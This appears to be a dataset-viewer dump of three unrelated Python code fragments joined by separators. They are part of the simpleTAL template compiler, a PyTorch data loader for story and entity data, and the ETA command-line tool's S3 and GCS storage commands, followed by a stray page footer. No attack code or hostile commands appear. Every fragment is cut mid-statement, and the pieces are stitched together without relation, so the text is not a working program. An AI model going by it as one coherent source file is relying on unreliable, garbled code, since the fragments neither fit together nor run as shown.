raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Determine what use-macro statement this belongs to by working through the list backwards
ourMacroLocation = None
location = len (self.tagStack) - 1
while (ourMacroLocation is None):
macroLocation = self.tagStack[location][2]
if (macroLocation is not None):
ourMacroLocation = macroLocation
else:
location -= 1
if (location < 0):
msg = "metal:fill-slot must be used inside a metal:use-macro call"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Get the use-macro command we are going to adjust
cmnd, args = self.commandList [ourMacroLocation]
self.log.debug ("Use macro argument: %s" % str (args))
macroName, slotMap, endSymbol = args
# Check that the name of the slot is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Slot name %s is invalid." % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
if (argument in slotMap):
msg = "Slot %s has already been filled!" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# The slot starts at the next command.
slot = SubTemplate (len (self.commandList), self.endTagSymbol)
slotMap [argument] = slot
# Update the command
self.commandList [ourMacroLocation] = (cmnd, (macroName, slotMap, endSymbol))
return None
def compileMetalDefineSlot (self, argument):
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! define-slot commands must be of the form: 'name'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Check that the name of the slot is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Slot name %s is invalid." % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
return (METAL_DEFINE_SLOT, (argument, self.endTagSymbol))
class TemplateParseException (Exception):
def __init__ (self, location, errorDescription):
self.location = location
self.errorDescription = errorDescription
def __str__ (self):
return "[" + self.location + "] " + self.errorDescription
class HTMLTemplateCompiler (TemplateCompiler, FixedHTMLParser.HTMLParser):
def __init__ (self):
TemplateCompiler.__init__ (self)
FixedHTMLParser.HTMLParser.__init__ (self)
self.log = logging.getLogger ("simpleTAL.HTMLTemplateCompiler")
def parseTemplate (self, file, minimizeBooleanAtts = False):
self.minimizeBooleanAtts = minimizeBooleanAtts
self.feed (file.read())
self.close()
def tagAsText (self, tagObj, singletonFlag=0):
""" This returns a tag as text.
"""
tag,atts = tagObj
result = ["<"]
result.append (tag)
upperTag = tag.upper()
for attName, attValue in atts:
if (self.minimizeBooleanAtts and '%s:%s' % (upperTag, attName.upper()) in HTML_BOOLEAN_ATTS):
# We should output a minimised boolean value
result.append (' ')
result.append (attName)
else:
result.append (' ')
result.append (attName)
result.append ('="')
result.append (html.escape (attValue, quote=1))
result.append ('"')
if (singletonFlag):
result.append (" />")
else:
result.append (">")
return "".join (result)
def handle_startendtag (self, tag, attributes):
self.handle_starttag (tag, attributes)
if not (tag.upper() in HTML_FORBIDDEN_ENDTAG):
self.handle_endtag(tag)
def handle_starttag (self, tag, attributes):
self.log.debug ("Received Start Tag: " + tag + " Attributes: " + str (attributes))
atts = []
for att, attValue in attributes:
# We need to spot empty tal:omit-tags
if (attValue is None):
if (att == self.tal_namespace_omittag):
atts.append ((att, ""))
else:
atts.append ((att, att))
elif not HTML_ENTITIES_PRE_EXPANDED:
# Expand any SGML entity references or char references
goodAttValue = []
last = 0
match = ENTITY_REF_REGEX.search (attValue)
while (match):
goodAttValue.append (attValue[last:match.start()])
ref = attValue[match.start():match.end()]
if (ref.startswith ('&#')):
# A char reference
if (ref[2] in ['x', 'X']):
# Hex
refValue = int (ref[3:-1], 16)
else:
refValue = int (ref[2:-1])
goodAttValue.append (chr (refValue))
else:
# A named reference.
goodAttValue.append (chr (sgmlentitynames.htmlNameToUnicodeNumber.get (ref[1:-1], 65533)))
last = match.end()
match = ENTITY_REF_REGEX.search (attValue, last)
goodAttValue.append (attValue [last:])
atts.append ((att, "".join (goodAttValue)))
else:
atts.append ((att, attValue))
if (tag.upper() in HTML_FORBIDDEN_ENDTAG):
# This should have no end tag, so we just do the start and suppress the end
self.parseStartTag (tag, atts)
self.log.debug ("End tag forbidden, generating close tag with no output.")
self.popTag ((tag, None), omitTagFlag=1)
else:
self.parseStartTag (tag, atts)
def handle_endtag (self, tag):
self.log.debug ("Recieved End Tag: " + tag)
if (tag.upper() in HTML_FORBIDDEN_ENDTAG):
self.log.warning ("HTML 4.01 forbids end tags for the %s element" % tag)
else:
# Normal end tag
self.popTag ((tag, None))
def handle_data (self, data):
self.parseData (html.escape (data, quote=False))
# These two methods are required so that we expand all character and entity references prior to parsing the template.
def handle_charref (self, ref):
self.log.debug ("Got Ref: %s", ref)
self.parseData (chr (int (ref)))
def handle_entityref (self, ref):
self.log.debug ("Got Ref: %s", ref)
# Use handle_data so that <&> are re-encoded as required.
self.handle_data( chr (sgmlentitynames.htmlNameToUnicodeNumber.get (ref, 65533)))
# Handle document type declarations
def handle_decl (self, data):
self.parseData ('<!%s>' % data)
# Pass comments through un-affected.
def handle_comment (self, data):
self.parseData ('<!--%s-->' % data)
def handle_pi (self, data):
self.log.debug ("Recieved processing instruction.")
self.parseData ('<?%s>' % data)
def report_unbalanced (self, tag):
self.log.warning ("End tag %s present with no corresponding open tag.")
def getTemplate (self):
template = HTMLTemplate (self.commandList, self.macroMap, self.symbolLocationTable, minimizeBooleanAtts = self.minimizeBooleanAtts)
return template
class XMLTemplateCompiler (TemplateCompiler, xml.sax.handler.ContentHandler, xml.sax.handler.DTDHandler, LexicalHandler):
def __init__ (self):
TemplateCompiler.__init__ (self)
xml.sax.handler.ContentHandler.__init__ (self)
self.doctype = None
self.log = logging.getLogger ("simpleTAL.XMLTemplateCompiler")
self.singletonElement = 0
def parseTemplate (self, templateFile):
self.ourParser = xml.sax.make_parser()
self.log.debug ("Setting features of parser")
try:
self.ourParser.setFeature (xml.sax.handler.feature_external_ges, False)
self.log.debug ("Set SAX Handler feature OK")
except:
pass
if use_lexical_handler:
self.ourParser.setProperty(xml.sax.handler.property_lexical_handler, self)
self.ourParser.setContentHandler (self)
self.ourParser.setDTDHandler (self)
self.ourParser.parse (templateFile)
def startDTD(self, name, public_id, system_id):
self.log.debug ("Recieved DOCTYPE: " + name + " public_id: " + public_id + " system_id: " + system_id)
if public_id:
self.doctype = '<!DOCTYPE %s PUBLIC "%s" "%s">' % (name, public_id, system_id,)
else:
self.doctype = '<!DOCTYPE %s SYSTEM "%s">' % (name, system_id,)
def startElement (self, tag, attributes):
self.log.debug ("Recieved Real Start Tag: " + tag + " Attributes: " + str (attributes))
try:
xmlText = self.ourParser.getProperty (xml.sax.handler.property_xml_string)
if (isinstance (xmlText, str)):
# Once issue 6686 is solved this should allow singletons to be detected
if (SINGLETON_XML_REGEX.match (xmlText)):
# This is a singleton!
self.singletonElement=1
else:
if (SINGLETON_BYTES_XML_REGEX.match (xmlText)):
# This is a singleton!
self.singletonElement = 1
except xml.sax.SAXException as e:
# Parser doesn't support this property
pass
# Convert attributes into a list of tuples
atts = []
for att in attributes.getNames():
self.log.debug ("Attribute name %s has value %s" % (att, attributes[att]))
atts.append ((att, attributes [att]))
self.parseStartTag (tag, atts, singletonElement=self.singletonElement)
def endElement (self, tag):
self.log.debug ("Recieved Real End Tag: " + tag)
self.parseEndTag (tag)
self.singletonElement = 0
def skippedEntity (self, name):
self.log.info ("Recieved skipped entity: %s" % name)
self.characters( chr (sgmlentitynames.htmlNameToUnicodeNumber.get (name, 65533)))
def characters (self, data):
#self.log.debug ("Recieved Real Data: " + data)
# Escape any data we recieve - we don't want any: <&> in there.
self.parseData (html.escape (data, quote=False))
def processingInstruction (self, target, data):
self.log.debug ("Recieved processing instruction.")
self.parseData ('<?%s %s?>' % (target, data))
def comment (self, data):
# This is only called if your XML parser supports the LexicalHandler interface.
self.parseData ('<!--%s-->' % | |
\
torch.LongTensor(sent).unsqueeze(0)
self.ctx[split][key] = \
torch.LongTensor(ctx).unsqueeze(0)
self.labels[split][key] = \
torch.FloatTensor(labels).unsqueeze(0)
self.sent_lengths[split][key] = \
torch.LongTensor([sl])
self.ctx_lengths[split][key] = \
torch.LongTensor([cl])
self.ids[split][key] = [id_]
else:
self.sent[split][key] = torch.cat(
[self.sent[split][key],
torch.LongTensor(sent).unsqueeze(0)], 0)
self.ctx[split][key] = torch.cat(
[self.ctx[split][key],
torch.LongTensor(ctx).unsqueeze(0)], 0)
self.labels[split][key] = torch.cat(
[self.labels[split][key],
torch.FloatTensor(labels).unsqueeze(0)], 0)
self.sent_lengths[split][key] = torch.cat(
[self.sent_lengths[split][key],
torch.LongTensor([sl])], 0)
self.ctx_lengths[split][key] = torch.cat(
[self.ctx_lengths[split][key],
torch.LongTensor([cl])], 0)
self.ids[split][key] += [id_]
self.raw[split][id_] = self.raw[split].get(id_, []) + [raw_sent]
self.raw_labels[split][id_] = raw_labels
self.size[split][key] = self.size[split].get(key, 0) + 1
# If you only have a development set, but want to train on a part of it,
# split the dev set into training/dev split using t_ratio % of the dev set
# for training and the remaining for test
def split_set(self, t_ratio=0.8, keep="dev", write="train"):
self.labels[write] = {}
self.sent[write] = {}
self.ctx[write] = {}
self.sent_lengths[write] = {}
self.ctx_lengths[write] = {}
self.ids[write] = {}
self.size[write] = {}
self.raw_labels[write] = {}
self.raw[write] = {}
keep_vals, write_vals = self.get_splits(keep, t_ratio)
for key in self.size[keep]:
if write_vals:
self.update_sets(write_vals[key], write, keep, key)
if keep_vals:
self.update_sets(keep_vals[key], keep, keep, key)
self.offset[write] = {i: 0 for i in self.labels[write]}
self.unfilled[write] = set(self.offset[write].keys())
self.offset[keep] = {i: 0 for i in self.labels[keep]}
self.unfilled[keep] = set(self.offset[keep].keys())
def update_sets(self, vals, write, keep, key):
idxs = torch.LongTensor(vals)
if self.is_cuda:
idxs = idxs.cuda()
self.labels[write][key] = \
self.labels[keep][key].index_select(0, idxs)
self.sent[write][key] = \
self.sent[keep][key].index_select(0, idxs)
self.ctx[write][key] = \
self.ctx[keep][key].index_select(0, idxs)
self.sent_lengths[write][key] = \
self.sent_lengths[keep][key].index_select(0, idxs)
self.ctx_lengths[write][key] = \
self.ctx_lengths[keep][key].index_select(0, idxs)
p = [self.ids[keep][key][i] for i in idxs]
self.size[write][key] = len(idxs)
self.raw[write].update({id_: self.raw[keep][id_] for
id_ in p})
self.raw_labels[write].update({id_: self.raw_labels[keep][id_] for
id_ in p})
self.ids[write][key] = p
def sample_keys(self, split):
return random.sample(self.unfilled[split], 1)[0]
def shuffle_sequences(self, split, keys):
orders = {}
for key in keys:
ex_order = torch.LongTensor(
range(self.labels[split][key].size(0)))
if self.is_cuda:
ex_order = ex_order.cuda()
random.shuffle(ex_order)
orders[key] = ex_order
self.labels[split][key] = \
self.labels[split][key].index_select(0, ex_order)
self.sent[split][key] = \
self.sent[split][key].index_select(0, ex_order)
self.ctx[split][key] = \
self.ctx[split][key].index_select(0, ex_order)
self.sent_lengths[split][key] = \
self.sent_lengths[split][key].index_select(0, ex_order)
self.ctx_lengths[split][key] = \
self.ctx_lengths[split][key].index_select(0, ex_order)
self.ids[split][key] = [self.ids[split][key][i]
for i in ex_order]
return orders
# keyss should be a list of keyss to reset
def reset_offsets(self, split=None, shuffle=True):
def reset_offset(split, keyss):
for keys in keyss:
if keys in self.offset[split]:
self.offset[split][keys] = 0
else:
print "keys not in offset"
self.unfilled[split] = \
self.unfilled[split].union(keyss)
if not split:
splits = self.splits
else:
splits = [split]
orders = {}
for split in splits:
keyss = self.offset[split].keys()
if shuffle:
orders[split] = \
self.shuffle_sequences(split, keyss)
reset_offset(split, keyss)
return orders
def sample_batches(self, split, keys=None, bs=None):
# If specific key isn't specified, sample a key
if not keys:
keys = self.sample_keys(split)
if not bs:
bs = self.batch_size
offset = self.offset[split]
# Choose sequences to batch
start_idx = offset[keys]
final_idx = offset[keys] + bs
num_sentences = self.sent[split][keys].size(0)
labels = self.labels[split][keys]
sentence = self.sent[split][keys]
sentence_lengths = self.sent_lengths[split][keys]
context = self.ctx[split][keys]
context_lengths = self.ctx_lengths[split][keys]
ids = self.ids[split][keys]
# Check if final index is greater than number of sequences
if final_idx < num_sentences:
idx_range = range(start_idx, final_idx)
idxs = torch.LongTensor(idx_range)
# Update offset for next access of this key
self.offset[split][keys] += bs
else:
# If it is, take a subset of the self.batch_size
idx_range = range(start_idx, num_sentences)
idxs = torch.LongTensor(idx_range)
self.offset[split][keys] = 0
if keys in self.unfilled[split]:
# This key has been visited completed
self.unfilled[split].remove(keys)
if self.is_cuda:
idxs = idxs.cuda(cfg.device)
ss = sentence.index_select(0, idxs)
sl = sentence_lengths.index_select(0, idxs)
cs = context.index_select(0, idxs)
cl = context_lengths.index_select(0, idxs)
lab = labels.index_select(0, idxs)
idss = ids[idx_range[0]:idx_range[-1] + 1]
return lab, ss, sl, cs, cl, None, None, None, idss, keys
def cuda(self, device_id=None):
if device_id is None:
device_id = cfg.device
for split in self.sent.keys():
for key in self.sent[split].keys():
self.sent[split][key] = \
self.sent[split][key].cuda(device_id)
self.sent_lengths[split][key] = \
self.sent_lengths[split][key].cuda(device_id)
self.ctx[split][key] = \
self.ctx[split][key].cuda(device_id)
self.ctx_lengths[split][key] = \
self.ctx_lengths[split][key].cuda(device_id)
self.labels[split][key] = \
self.labels[split][key].cuda(device_id)
self.is_cuda = True
class MemoryModelDataLoader(NeuralModelDataLoader):
def __init__(self, opt=None, batch_size=32):
super(MemoryModelDataLoader, self).__init__(opt, batch_size)
self.is_ren = True
def do_context(self, ctx_, char_lines, line_num):
# Place context lines for a story sentence in a dictionary
# where each key is the order of the sentence
ctx = {}
for line in range(len(ctx_)):
if line < line_num:
ctx[line + 1] = [self.vocabs["sentence"][i]
for i in ctx_[line]]
return ctx
# ent_ments is entities mentioned in every line
# num_ents is the entity identity
def do_entities(self, ent_ments, num_ents):
elabel = {}
eids = [0] * len(num_ents)
# Get entity ids from vocab
for ent, idx in num_ents.iteritems():
if ent.lower() not in self.vocabs["entity"]._index:
print ent.lower()
eids[idx] = self.vocabs["entity"][ent.lower()]
# Get entity labels at each step for
# additional supervision
for i in range(1, 6):
ent_list = ent_ments.get(i, [])
elabel[i] = [0] * len(num_ents)
for ent in ent_list:
elabel[i][num_ents[ent]] = 1
return eids, elabel
def do_row(self, row, ents, ent_ments, num_ents,
split, counter, same_row=None):
# Find entity in entity file
story = row["storyid"]
char = row["char"]
line_num = row["linenum"]
# Extract sentences and context
raw_sent = lit_eval(row["sentence"])
ctx_ = ctx_lit_eval(row["context"])
# Find the lines in the story in which this character appears
char_lines = ents[(story, char)]
# Get previous sentences to make context data structure
ctx = self.do_context(ctx_, char_lines, line_num)
# Get entities
eids, elabels = self.do_entities(ent_ments, num_ents)
# Get context and sentence
sent = [self.vocabs["sentence"][i] for i in raw_sent]
# Get story id_
if same_row is not None:
id_ = (story, char, line_num)
else:
counter.setdefault((story, char, line_num), 0)
id_ = (story, char, line_num, counter[(story, char, line_num)])
counter[(story, char, line_num)] += 1
# Get sentence lengths
sl = len(sent)
sent_diff = self.sent_maxes[split] - sl
sent += [0] * sent_diff
# Get context lengths
clengths = {}
for i in ctx:
clengths[i] = len(ctx[i])
ctx_diff = self.ctx_maxes[split][i - 1] - clengths[i]
ctx[i] += [0] * ctx_diff
# Get labels for this point
labels, raw_labels = self.make_label_point(row, same_row)
# Make the key for the group this data point belongs to
key = (line_num, len(num_ents))
# Add the example to all the corresponding data stores
# for each part of the data point (sentence, labels, context, etc.)
if key not in self.sent[split]:
self.sent[split][key] = \
torch.LongTensor(sent).unsqueeze(0)
self.labels[split][key] = \
torch.FloatTensor(labels).unsqueeze(0)
self.sent_lengths[split][key] = \
torch.LongTensor([sl])
self.ent[split][key] = \
torch.LongTensor([num_ents[char]])
self.ent_init[split][key] = \
torch.LongTensor(eids).unsqueeze(0)
self.ids[split][key] = [id_]
self.ctx[split][key] = {}
self.ctx_lengths[split][key] = {}
self.ent_labels[split][key] = {}
for i in range(1, key[0]):
self.ctx[split][key][i] = \
torch.LongTensor(ctx[i]).unsqueeze(0)
self.ctx_lengths[split][key][i] = \
torch.LongTensor([clengths[i]])
self.ent_labels[split][key][i] = \
torch.FloatTensor([elabels[i]])
self.ent_labels[split][key][key[0]] = \
torch.FloatTensor([elabels[key[0]]])
else:
self.sent[split][key] = torch.cat(
[self.sent[split][key],
torch.LongTensor(sent).unsqueeze(0)], 0)
self.labels[split][key] = torch.cat(
[self.labels[split][key],
torch.FloatTensor(labels).unsqueeze(0)], 0)
self.sent_lengths[split][key] = torch.cat(
[self.sent_lengths[split][key],
torch.LongTensor([sl])], 0)
self.ent[split][key] = torch.cat(
[self.ent[split][key],
torch.LongTensor([num_ents[char]])], 0)
self.ent_init[split][key] = torch.cat(
[self.ent_init[split][key],
torch.LongTensor(eids).unsqueeze(0)], 0)
for i in range(1, key[0]):
# try:
self.ctx[split][key][i] = torch.cat(
[self.ctx[split][key][i],
torch.LongTensor(ctx[i]).unsqueeze(0)], 0)
self.ctx_lengths[split][key][i] = torch.cat(
[self.ctx_lengths[split][key][i],
torch.LongTensor([clengths[i]])], 0)
self.ent_labels[split][key][i] = torch.cat(
[self.ent_labels[split][key][i],
torch.FloatTensor([elabels[i]])], 0)
self.ent_labels[split][key][key[0]] = torch.cat(
[self.ent_labels[split][key][key[0]],
torch.FloatTensor([elabels[key[0]]])], 0)
self.ids[split][key] += [id_]
self.raw[split][id_] = self.raw[split].get(id_, []) + [raw_sent]
self.raw_labels[split][id_] = raw_labels
self.size[split][key] = self.size[split].get(key, 0) + 1
# Sample a batch from the data_loader
def sample_batches(self, split, keys=None, bs=None):
# If specific key isn't specified, sample a key
if not keys:
keys = self.sample_keys(split)
if not bs:
bs = self.batch_size
offset = self.offset[split]
# Choose sequences to batch
start_idx = offset[keys]
final_idx = offset[keys] + bs
# Cache the correct data stores
num_sentences = self.sent[split][keys].size(0)
labels = self.labels[split][keys]
sentence = self.sent[split][keys]
sentence_lengths = self.sent_lengths[split][keys]
context = self.ctx[split][keys]
context_lengths = self.ctx_lengths[split][keys]
ent = self.ent[split][keys]
ent_init = self.ent_init[split][keys]
ent_labels = self.ent_labels[split][keys]
ids = self.ids[split][keys]
# Check if final index is greater than number of sequences
if final_idx < num_sentences:
idx_range = range(start_idx, final_idx)
idxs = torch.LongTensor(idx_range)
# Update offset for next access of this key
self.offset[split][keys] += bs
else:
# If it is, take a subset of the self.batch_size
idx_range = range(start_idx, num_sentences)
idxs = torch.LongTensor(idx_range)
self.offset[split][keys] = 0
if keys in self.unfilled[split]:
# This key has been visited completed
self.unfilled[split].remove(keys)
if self.is_cuda:
idxs = idxs.cuda(cfg.device)
s = sorted(context.keys())
# Select the correct examples using the sampled indices
ss = sentence.index_select(0, idxs)
sl = sentence_lengths.index_select(0, idxs)
cs = {cn: context[cn].index_select(0, idxs) for cn in s}
cl = {cn: context_lengths[cn].index_select(0, idxs) for cn in s}
e = ent.index_select(0, | |
S3DeleteDirCommand)
@staticmethod
def execute(parser, args):
parser.print_help()
class S3InfoCommand(Command):
"""Get information about files/folders in S3.
Examples:
# Get file info
eta s3 info <cloud-path> [...]
# Get folder info
eta s3 info --folder <cloud-path> [...]
"""
@staticmethod
def setup(parser):
parser.add_argument(
"paths",
nargs="+",
metavar="CLOUD_PATH",
help="the path(s) of the files of interest in S3",
)
parser.add_argument(
"-f",
"--folder",
action="store_true",
help="whether the provided" "paths are folders, not files",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.folder:
metadata = [client.get_folder_metadata(p) for p in args.paths]
_print_s3_folder_info_table(metadata)
return
metadata = [client.get_file_metadata(p) for p in args.paths]
_print_s3_file_info_table(metadata)
class S3ListCommand(Command):
"""List contents of an S3 folder.
Examples:
# List folder contents
eta s3 list s3://<bucket>/<prefix>
# List folder contents recursively
eta s3 list s3://<bucket>/<prefix> --recursive
# List folder contents according to the given query
eta s3 list s3://<bucket>/<prefix>
[--recursive]
[--limit <limit>]
[--search [<field><operator>]<str>[,...]]
[--sort-by <field>]
[--ascending]
[--count]
# List the last 10 modified files that contain "test" in any field
eta s3 list s3://<bucket>/<prefix> \\
--search test --limit 10 --sort-by last_modified
# List files whose size is 10-20MB, from smallest to largest
eta s3 list s3://<bucket>/<prefix> \\
--search 'size>10MB,size<20MB' --sort-by size --ascending
# List files that were uploaded before November 26th, 2019, recurisvely
# traversing subfolders, and display the count
eta s3 list s3://<bucket>/<prefix> \\
--recursive --search 'last modified<2019-11-26' --count
Search syntax:
The generic search syntax is:
--search [<field><operator>]<str>[,...]
where:
<field> an optional field name on which to search
<operator> an optional operator to use when evaluating matches
<str> the search string
If <field><operator> is omitted, the search will match any records for
which any column contains the given search string.
Multiple searches can be specified as a comma-separated list. Records
must match all searches in order to appear in the search results.
The supported fields are:
field type description
------------- -------- ------------------------------------------
bucket string the name of the bucket
name string the name of the object in the bucket
size bytes the size of the object
type string the MIME type of the object
last modified datetime the date that the object was last modified
Fields are case insensitive, and underscores can be used in-place of
spaces.
The meaning of the operators are as follows:
operator type description
--------- ---------- --------------------------------------------------
: contains the field contains the search string
== comparison the search string is equal to the field
< comparison the search string is less than the field
<= comparison the search string is less or equal to the field
> comparison the search string is greater than the field
>= comparison the search string is greater or equal to the field
For contains (":") queries, the search/record values are parsed as
follows:
type description
-------- --------------------------------------------------------------
string the search and record are treated as strings
bytes the search is treated as a string, and the record is converted
to a human-readable bytes string
datetime the search is treated as a string, and the record is rendered
as a string in "%Y-%m-%d %H:%M:%S %Z" format in local timezone
For comparison ("==", "<", "<=", ">", ">=") queries, the search/record
values are parsed as follows:
type description
-------- ------------------------------------------------------------
string the search and record are treated as strings
bytes the search must be a human-readable bytes string, which is
converted to numeric bytes for comparison with the record
datetime the search must be an ISO time string, which is converted to
a datetime for comparison with the record. If no timezone is
included in the search, local time is assumed
You can include special characters (":", "=", "<", ">", ",") in search
strings by escaping them with "\\".
"""
@staticmethod
def setup(parser):
parser.add_argument(
"folder", metavar="CLOUD_DIR", help="the S3 folder to list"
)
parser.add_argument(
"-r",
"--recursive",
action="store_true",
help="whether to " "recursively list the contents of subfolders",
)
parser.add_argument(
"-l",
"--limit",
metavar="LIMIT",
type=int,
default=-1,
help="limit the number of files listed",
)
parser.add_argument(
"-s",
"--search",
metavar="SEARCH",
help="search to limit results when listing files",
)
parser.add_argument(
"--sort-by",
metavar="FIELD",
help="field to sort by when listing files",
)
parser.add_argument(
"--ascending",
action="store_true",
help="whether to sort in ascending order",
)
parser.add_argument(
"-c",
"--count",
action="store_true",
help="whether to show the number of files in the list",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
metadata = client.list_files_in_folder(
args.folder, recursive=args.recursive, return_metadata=True
)
metadata = _filter_records(
metadata,
args.limit,
args.search,
args.sort_by,
args.ascending,
_S3_SEARCH_FIELDS_MAP,
)
_print_s3_file_info_table(metadata, show_count=args.count)
class S3UploadCommand(Command):
"""Upload file to S3.
Examples:
# Upload file
eta s3 upload <local-path> <cloud-path>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"local_path",
metavar="LOCAL_PATH",
help="the path to the file to " "upload",
)
parser.add_argument(
"cloud_path",
metavar="CLOUD_PATH",
help="the path to the S3 " "object to create",
)
parser.add_argument(
"-t",
"--content-type",
metavar="TYPE",
help="an optional content "
"type of the file. By default, the type is guessed from the "
"filename",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
print("Uploading '%s' to '%s'" % (args.local_path, args.cloud_path))
client.upload(
args.local_path, args.cloud_path, content_type=args.content_type
)
class S3UploadDirectoryCommand(Command):
"""Upload directory to S3.
Examples:
# Upload directory
eta s3 upload-dir <local-dir> <cloud-dir>
# Upload-sync directory
eta s3 upload-dir --sync <local-dir> <cloud-dir>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"local_dir",
metavar="LOCAL_DIR",
help="the directory of files to " "upload",
)
parser.add_argument(
"cloud_dir",
metavar="CLOUD_DIR",
help="the S3 directory to " "upload into",
)
parser.add_argument(
"--sync",
action="store_true",
help="whether to sync the S3 "
"directory to match the contents of the local directory",
)
parser.add_argument(
"-o",
"--overwrite",
action="store_true",
help="whether to "
"overwrite existing files; only valid in `--sync` mode",
)
parser.add_argument(
"-r",
"--recursive",
action="store_true",
help="whether to "
"recursively upload the contents of subdirecotires",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.sync:
client.upload_dir_sync(
args.local_dir,
args.cloud_dir,
overwrite=args.overwrite,
recursive=args.recursive,
)
else:
client.upload_dir(
args.local_dir, args.cloud_dir, recursive=args.recursive
)
class S3DownloadCommand(Command):
"""Download file from S3.
Examples:
# Download file
eta s3 download <cloud-path> <local-path>
# Print download to stdout
eta s3 download <cloud-path> --print
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_path",
metavar="CLOUD_PATH",
help="the S3 object to " "download",
)
parser.add_argument(
"local_path",
nargs="?",
metavar="LOCAL_PATH",
help="the path to "
"which to write the downloaded file. If not provided, the "
"filename of the file in S3 is used",
)
parser.add_argument(
"--print",
action="store_true",
help="whether to print the "
"download to stdout. If true, a file is NOT written to disk",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.print:
print(client.download_bytes(args.cloud_path))
else:
local_path = args.local_path
if local_path is None:
local_path = client.get_file_metadata(args.cloud_path)["name"]
print("Downloading '%s' to '%s'" % (args.cloud_path, local_path))
client.download(args.cloud_path, local_path)
class S3DownloadDirectoryCommand(Command):
"""Download directory from S3.
Examples:
# Download directory
eta s3 download-dir <cloud-folder> <local-dir>
# Download directory sync
eta s3 download-dir --sync <cloud-folder> <local-dir>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_dir",
metavar="CLOUD_DIR",
help="the S3 directory to " "download",
)
parser.add_argument(
"local_dir",
metavar="LOCAL_DIR",
help="the directory to which to " "download files into",
)
parser.add_argument(
"--sync",
action="store_true",
help="whether to sync the local"
"directory to match the contents of the S3 directory",
)
parser.add_argument(
"-o",
"--overwrite",
action="store_true",
help="whether to "
"overwrite existing files; only valid in `--sync` mode",
)
parser.add_argument(
"-r",
"--recursive",
action="store_true",
help="whether to "
"recursively download the contents of subdirecotires",
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
if args.sync:
client.download_dir_sync(
args.cloud_dir,
args.local_dir,
overwrite=args.overwrite,
recursive=args.recursive,
)
else:
client.download_dir(
args.cloud_dir, args.local_dir, recursive=args.recursive
)
class S3DeleteCommand(Command):
"""Delete file from S3.
Examples:
# Delete file
eta s3 delete <cloud-path>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_path", metavar="CLOUD_PATH", help="the S3 file to delete"
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
print("Deleting '%s'" % args.cloud_path)
client.delete(args.cloud_path)
class S3DeleteDirCommand(Command):
"""Delete directory from S3.
Examples:
# Delete directory
eta s3 delete-dir <cloud-dir>
"""
@staticmethod
def setup(parser):
parser.add_argument(
"cloud_dir", metavar="CLOUD_DIR", help="the S3 folder to delete"
)
@staticmethod
def execute(parser, args):
client = etast.S3StorageClient()
print("Deleting '%s'" % args.cloud_dir)
client.delete_folder(args.cloud_dir)
class GCSCommand(Command):
"""Tools for working with Google Cloud Storage."""
@staticmethod
def setup(parser):
subparsers = parser.add_subparsers(title="available commands")
_register_command(subparsers, "info", GCSInfoCommand)
_register_command(subparsers, "list", GCSListCommand)
_register_command(subparsers, "upload", GCSUploadCommand)
_register_command(subparsers, "upload-dir", GCSUploadDirectoryCommand)
_register_command(subparsers, "download", GCSDownloadCommand)
_register_command(
subparsers, "download-dir", GCSDownloadDirectoryCommand
)
_register_command(subparsers, "delete", GCSDeleteCommand)
_register_command(subparsers, "delete-dir", GCSDeleteDirCommand)
@staticmethod
def execute(parser, args):
parser.print_help()
class GCSInfoCommand(Command):
"""Get information about files/folders in GCS.
Examples:
# Get file info
eta gcs |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.